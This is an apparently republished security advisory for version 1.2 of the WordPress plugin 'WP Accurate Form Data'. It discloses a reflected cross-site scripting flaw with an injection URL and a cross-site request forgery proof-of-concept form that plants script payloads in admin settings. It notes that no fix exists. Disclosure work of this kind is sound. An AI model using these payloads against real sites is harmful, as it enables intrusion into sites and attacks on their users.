WordPress WP Accurate Form Data 1.2 XSS / CSRF

Posted on Posted in Exploit

WordPress WP Accurate Form Data plugin version 1.2 suffers from cross site request forgery and cross site scripting vulnerabilities.

Title: WordPress 'WP Accurate Form Data' Plugin 
Version: 1.2
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-21
Download: 
- https://wordpress.org/plugins/accurate-form-data-real-time-form-validation/
- https://plugins.svn.wordpress.org/accurate-form-data-real-time-form-validation/
Notified WordPress: 2015-06-21
==========================================================

## Plugin description
==========================================================
The plugin performs E-mail and Physical Address validations automatically for most wordpress contact forms.

## XSS Vulnerabilities
==========================================================
The request URI is echo'ed into the HTML page without sanitization. This can be exploited with a malicious URL (keep in mind that most modern browsers encode the url).

http://[URL]/wp-admin/options-general.php?page=Accu_Data_WP&a="><script>alert(1)</script>

----

The options on the admin settings page are displayed/stored without sanitization. This can be exploited with a crafted POST request.

PoC (using CSRF):

Log in as admin and submit the following form:

<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=Accu_Data_WP"> 
   <input type="text" name="wClientKey" value=""><script>alert(1)</script>"><br />
   <text>wCheckEmailValidity: </text>
   <input type="text" name="wCheckEmailValidity" value=""><br />
   <input type="text" name="wIncludeOpen" value=""><br />
   <input type="text" name="wEmailBlockAttempts" value=""><script>alert(4)</script>"><br />
   <input type="text" name="wEmailFields" value=""><script>alert(5)</script>"><br />
   <input type="text" name="wCheckPhysicalAddressValidity" value=""><br />
   <input type="text" name="wPhysicalAddressBlockAttempts" value=""><script>alert(7)</script>"><br />
   <input type="text" name="wCityFields" value=""><script>alert(8)</script>"><br />
   <input type="text" name="wZipFields" value=""><script>alert(9)</script>"><br />
   <input type="text" name="wAddressFields" value=""><script>alert(10)</script>"><br />
   <input type="text" name="wStateFields" value=""><script>alert(11)</script>"><br />
   <input type="text" name="wCountryFields" value=""><script>alert(12)</script>"><br />
   <text>wSub </text>
  <input type="text" name="wSub" value="Save Changes" readonly><br />
  <input type="submit">
</form>


## Solution
==========================================================
No fix available

==========================================================
XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.

Quelle: Packet storm Security

Facebooktwittergoogle_plus